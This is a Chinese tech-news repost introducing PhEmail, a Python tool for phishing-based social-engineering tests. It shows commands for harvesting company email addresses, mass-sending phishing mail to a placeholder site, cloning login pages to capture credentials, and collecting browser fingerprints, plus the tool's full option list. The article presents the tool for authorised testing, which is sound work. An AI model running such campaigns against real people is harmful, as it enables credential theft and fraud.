自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

51CTO首頁(yè)

AI.x社區(qū)

軟考社區(qū)

免費(fèi)課

企業(yè)培訓(xùn)

鴻蒙開(kāi)發(fā)者社區(qū)

WOT技術(shù)大會(huì)

公眾號(hào)矩陣

移動(dòng)端

視頻課免費(fèi)課排行榜短視頻直播課軟考學(xué)堂

全部課程軟考華為認(rèn)證廠商認(rèn)證 IT技術(shù)PMP項(xiàng)目管理免費(fèi)題庫(kù)

在線學(xué)習(xí)

文章資源問(wèn)答課堂專欄直播

51CTO

鴻蒙開(kāi)發(fā)者社區(qū)

51CTO技術(shù)棧

51CTO官微

51CTO學(xué)堂

51CTO博客

CTO訓(xùn)練營(yíng)

鴻蒙開(kāi)發(fā)者社區(qū)訂閱號(hào)

51CTO軟考

51CTO學(xué)堂APP

51CTO學(xué)堂企業(yè)版APP

鴻蒙開(kāi)發(fā)者社區(qū)視頻號(hào)

51CTO軟考題庫(kù)

賬號(hào)設(shè)置退出

PhEmail：基于Python的開(kāi)源網(wǎng)絡(luò)釣魚(yú)攻擊工具

作者：佚名 2017-08-17 18:20:38

安全黑客攻防

PhEmail是一款采用Python編程語(yǔ)言開(kāi)發(fā)的開(kāi)源網(wǎng)絡(luò)釣魚(yú)郵件工具，它可以幫助研究人員在進(jìn)行社會(huì)工程學(xué)測(cè)試的過(guò)程中自動(dòng)化地給目標(biāo)發(fā)送網(wǎng)絡(luò)釣魚(yú)郵件。PhEmail不僅可以同時(shí)向多個(gè)目標(biāo)用戶發(fā)送釣魚(yú)郵件并識(shí)別出哪些用戶點(diǎn)擊了郵件，而且還可以在不利用任何瀏覽器漏洞或郵件客戶端漏洞的前提下盡可能多地收集信息。

PhEmail簡(jiǎn)介

PhEmail是一款采用Python編程語(yǔ)言開(kāi)發(fā)的開(kāi)源網(wǎng)絡(luò)釣魚(yú)郵件工具，它可以幫助研究人員在進(jìn)行社會(huì)工程學(xué)測(cè)試的過(guò)程中自動(dòng)化地給目標(biāo)發(fā)送網(wǎng)絡(luò)釣魚(yú)郵件。PhEmail不僅可以同時(shí)向多個(gè)目標(biāo)用戶發(fā)送釣魚(yú)郵件并識(shí)別出哪些用戶點(diǎn)擊了郵件，而且還可以在不利用任何瀏覽器漏洞或郵件客戶端漏洞的前提下盡可能多地收集信息。PhEmail自帶的引擎可以通過(guò)LinkedIN來(lái)收集電子郵箱地址，這些數(shù)據(jù)可以幫助測(cè)試人員完成信息采集階段的一部分工作。

除此之外，PhEmail還支持Gmail身份驗(yàn)證，這一功能在目標(biāo)站點(diǎn)屏蔽了郵件源或IP地址的情況下會(huì)非常有用。值得一提的是，該工具還可以克隆目標(biāo)組織或企業(yè)的門(mén)戶網(wǎng)站登錄界面，測(cè)試人員可以用這些偽造的頁(yè)面來(lái)竊取目標(biāo)用戶的登錄憑證。

使用樣例

一般來(lái)說(shuō)，第一步是收集目標(biāo)企業(yè)的郵箱地址。PhEmail的搜索引擎在收集到了企業(yè)郵箱地址之后，會(huì)將它們保存在一個(gè)文件中，演示代碼如下：

# phemail.py -g1@example.com 
Gathering emails from domain: example.com100%  
Completed! 
test@example.com 
test2@example.com […] emails.txt updated

得到了企業(yè)郵箱地址之后，接下來(lái)就要?jiǎng)?chuàng)建釣魚(yú)郵件模板了。模板中的每一個(gè)URL必須要包含一個(gè)字符串”{0}”，因?yàn)槟_本會(huì)自動(dòng)將這個(gè)字符串替換成正確的URL地址。一次真實(shí)的測(cè)試場(chǎng)景截圖如下：

接下來(lái)，我們需要在Web服務(wù)器上安裝php環(huán)境并將php文件”index.php”復(fù)制到Web服務(wù)器的根目錄下。這個(gè)文件中包含的JavaScript代碼會(huì)收集瀏覽器信息并將其保存到/tmp目錄下的日志文件中。演示實(shí)例如下：

# phemail.py -e test-emails.txt -f"Fast Holiday " -r "Fast Holiday " -s "Last MinuteHoliday" -b body.txt -w http://YOUR-WEBSITE.com 
SMTP server: mail.example.com  
Sent to test@example.com 
Error: sending tonotExist-email@example.com  
Phishing URLs point to http://YOUR-WEBSITE.com 
Phemail.py log file saved: phemail-log-12-07-2012_15-42.txt

接下來(lái)，你只需要等待目標(biāo)用戶點(diǎn)擊釣魚(yú)郵件，然后你就能夠收集到目標(biāo)用戶的某些瀏覽器信息了：

Email: test@example.com 
Date: Thu 12/07/2012 11:00:13  
IP: 192.168.0.123  
User Agent: Mozilla/5.0 (Windows NT 6.1;WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 appCodeName: Mozilla appName:Netscape appVersion: 5.0 (Windows) appMinorVersion: undefined product: GeckocookieEnabled: true cpuClass: undefined onLine: true opsProfile: undefineduserProfile: undefined language: en-US platform: Win32 systemLanguage:undefined userLanguage: undefined flash: Enabled Plugins: Google UpdateShockwave Flash 11.3 r300 Google Talk Plugin Video Acceleratorversion:0.1.44.16 Version 3.1.4.8140 5.1.10411.0 Adobe PDF Plug-In For Firefoxand Netscape 10.1.3 NPRuntime Script Plug-in Library for Java™ Deploy VmwareRemote Console and Client Integration Plug-in BlackBerry WebSL Browser Plug-InBing Bar The plug-in allows you to open and edit files using Microsoft Officeapplications Office Authorization plug-in for NPAPI browsers

PhEmail項(xiàng)目主頁(yè)

【 GitHub傳送門(mén) 】

工具下載

你可以直接通過(guò)克隆PhEmail的GitHub代碼庫(kù)來(lái)完成工具的下載：

git clone https://github.com/Dionach/PhEmail

工具使用

PHishing EMAIL tool v0.13 
Usage: phemail.py [-e <emails>] [-m<mail_server>] [-f <from_address>] [-r <replay_address>] [-s<subject>] [-b <body>] 
         -e    emails: File containing list of emails(Default: emails.txt) 
         -f    from_address: Source emailaddress displayed in FROM field of the email (Default: Name Surname<name_surname@example.com>) 
         -r    reply_address: Actual emailaddress used to send the emails in case that people reply to the email(Default: Name Surname <name_surname@example.com>) 
         -s    subject: Subject of theemail (Default: Newsletter) 
         -b    body: Body of the email(Default: body.txt) 
         -p    pages: Specifies number ofresults pages searched (Default: 10 pages) 
         -v    verbose: Verbose Mode(Default: false) 
         -l    layout: Send email with noembedded pictures  
         -B    BeEF: Add the hook for BeEF 
         -m    mail_server: SMTP mailserver to connect to 
         -g    Google: Use a google accountusername:password 
         -t    Time delay: Add deleaybetween each email (Default: 3 sec) 
         -R    Bunch of emails per time(Default: 10 emails) 
         -L    webserverLog: Customise thename of the webserver log file (Default: Date time in format"%d_%m_%Y_%H_%M") 
         -S    Search: query on Google 
         -d    domain: of email addresses 
         -n    number: of emails perconnection (Default: 10 emails) 
          -c   clone: Clone a web page 
         -w    website: where the phishingemail link points to 
         -o    save output in a file 
         -F    Format (Default: 0):  
                0- firstname surname 
                1- firstname.surname@example.com 
                2- firstnamesurname@example.com 
                3- f.surname@example.com 
                4- firstname.s@example.com 
                5-surname.firstname@example.com 
                6- s.firstname@example.com 
                7- surname.f@example.com 
                8- surnamefirstname@example.com 
                9- firstname_

免責(zé)聲明

請(qǐng)不要在沒(méi)有得到目標(biāo)用戶事先同意的情況下實(shí)用PhEmail來(lái)進(jìn)行測(cè)試，由使用者自身使用不當(dāng)所帶來(lái)的問(wèn)題開(kāi)發(fā)人員不承擔(dān)任何責(zé)任，同時(shí)我們也對(duì)PhEmail所帶來(lái)的損失概不負(fù)責(zé)，請(qǐng)大家妥善使用。

責(zé)任編輯：未麗燕來(lái)源： FreeBuf

PhEmail Python Web服務(wù)器

點(diǎn)贊

51CTO技術(shù)棧公眾號(hào)

業(yè)務(wù)
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開(kāi)發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學(xué)堂精培企業(yè)培訓(xùn) CTO訓(xùn)練營(yíng)

<kbd id="71vd5"></kbd>